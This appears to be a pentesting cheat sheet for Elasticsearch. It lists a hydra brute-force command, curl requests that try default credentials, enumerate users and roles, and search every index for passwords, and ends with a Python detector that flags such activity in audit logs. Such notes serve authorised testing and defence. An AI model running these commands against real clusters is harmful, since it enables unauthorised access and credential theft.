Elasticsearch Pentesting

Last modified: 2023-02-05

Web

Elasticsearch is a search engine based on the Lucene library. Default ports are 9200 (HTTP API) and 9300.

Enumeration

Brute Force Credentials

Brute force the HTTP basic-auth credentials sent in the "Authorization" header:

hydra -L usernames.txt -P passwords.txt <target-ip> -s 9200 http-get /

Access over HTTP

Elasticsearch exposes its REST API over HTTP, so it can be queried directly with curl. Note that `-X` takes a request method, not a URL; plain GET requests need no `-X` at all.

# Basic
curl http://10.0.0.1:9200/

# Default credentials
curl http://admin:elasticadmin@10.0.0.1:9200/
curl http://elastic:changeme@10.0.0.1:9200/

# User and role enumeration (_security on 7.x+, _xpack/security on older 6.x versions)
curl http://10.0.0.1:9200/_security/role
curl http://10.0.0.1:9200/_security/user

curl http://10.0.0.1:9200/_xpack/security/user

# Search across all indices for interesting field names
curl 'http://10.0.0.1:9200/_search?q=username'
curl 'http://10.0.0.1:9200/_search?q=password'

# Others
curl http://10.0.0.1:9200/_cat/
curl http://10.0.0.1:9200/_cluster/
curl http://10.0.0.1:9200/_nodes/
curl http://10.0.0.1:9200/_remote/
curl http://10.0.0.1:9200/_security/
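From the defender's side, both the hydra guessing above and the endpoint walk over HTTP leave a clear trail in Elasticsearch's JSON audit log. The following is an added example, not part of the original cheat sheet: it parses constructed audit-style lines (field names such as `event.action`, `origin.address`, `url.path` and `url.query` are assumed from the audit log format) and flags hosts with repeated failed logins plus successful calls to the `_security`, `_cat`, `_cluster`, `_nodes` and `_remote` endpoints or searches for `password`/`username`.

```python
import json
from collections import Counter

# Constructed sample lines shaped like Elasticsearch JSON audit events. The field
# names (event.action, origin.address, user.name, request.method, url.path,
# url.query) are assumed from the audit log format; every value is made up.
SAMPLE_AUDIT_LINES = [
    '{"event.action":"authentication_failed","origin.address":"10.0.0.5:51001","user.name":"admin","request.method":"GET","url.path":"/"}',
    '{"event.action":"authentication_failed","origin.address":"10.0.0.5:51002","user.name":"elastic","request.method":"GET","url.path":"/"}',
    '{"event.action":"authentication_failed","origin.address":"10.0.0.5:51003","user.name":"kibana","request.method":"GET","url.path":"/"}',
    '{"event.action":"authentication_failed","origin.address":"10.0.0.9:40001","user.name":"elastic","request.method":"GET","url.path":"/"}',
    '{"event.action":"authentication_success","origin.address":"10.0.0.9:40002","user.name":"elastic","request.method":"GET","url.path":"/_security/user"}',
    '{"event.action":"authentication_success","origin.address":"10.0.0.9:40003","user.name":"elastic","request.method":"GET","url.path":"/_search","url.query":"q=password"}',
    '{"event.action":"anonymous_access_denied","origin.address":"10.0.0.7:40010","request.method":"GET","url.path":"/_cat/"}',
    '{"event.action":"authentication_success","origin.address":"10.0.0.20:40020","user.name":"app","request.method":"POST","url.path":"/logs-2023/_search"}',
]

# Endpoints used in the enumeration above; ordinary application users never call them.
SENSITIVE_PREFIXES = ("/_security", "/_xpack/security", "/_cat", "/_cluster", "/_nodes", "/_remote")
SENSITIVE_QUERY_TERMS = ("password", "username")
FAILED_ACTIONS = ("authentication_failed", "realm_authentication_failed", "anonymous_access_denied")

def parse_events(lines):
    """Parse one JSON audit event per line, ignoring lines that are not JSON objects."""
    return [json.loads(line) for line in lines if line.startswith("{")]

def origin_host(event):
    """Strip the ephemeral source port so repeated attempts from one host group together."""
    return event.get("origin.address", "").rsplit(":", 1)[0]

def brute_force_origins(events, threshold=3):
    """Hosts with at least `threshold` failed or anonymous attempts (hydra-style guessing)."""
    failures = Counter(origin_host(e) for e in events if e.get("event.action") in FAILED_ACTIONS)
    return {host: n for host, n in failures.items() if n >= threshold}

def sensitive_hits(events):
    """Successful requests to security/admin endpoints or searches for credential terms."""
    hits = []
    for e in events:
        if e.get("event.action") != "authentication_success":
            continue
        path, query = e.get("url.path", ""), e.get("url.query", "").lower()
        if path.startswith(SENSITIVE_PREFIXES) or any(t in query for t in SENSITIVE_QUERY_TERMS):
            hits.append((origin_host(e), e.get("user.name", "-"), e.get("request.method", "-"), path))
    return hits
```

Audit logging is off by default and must be enabled on the node before any of these events exist; the threshold and endpoint list should be tuned to what legitimate tooling in your environment actually calls.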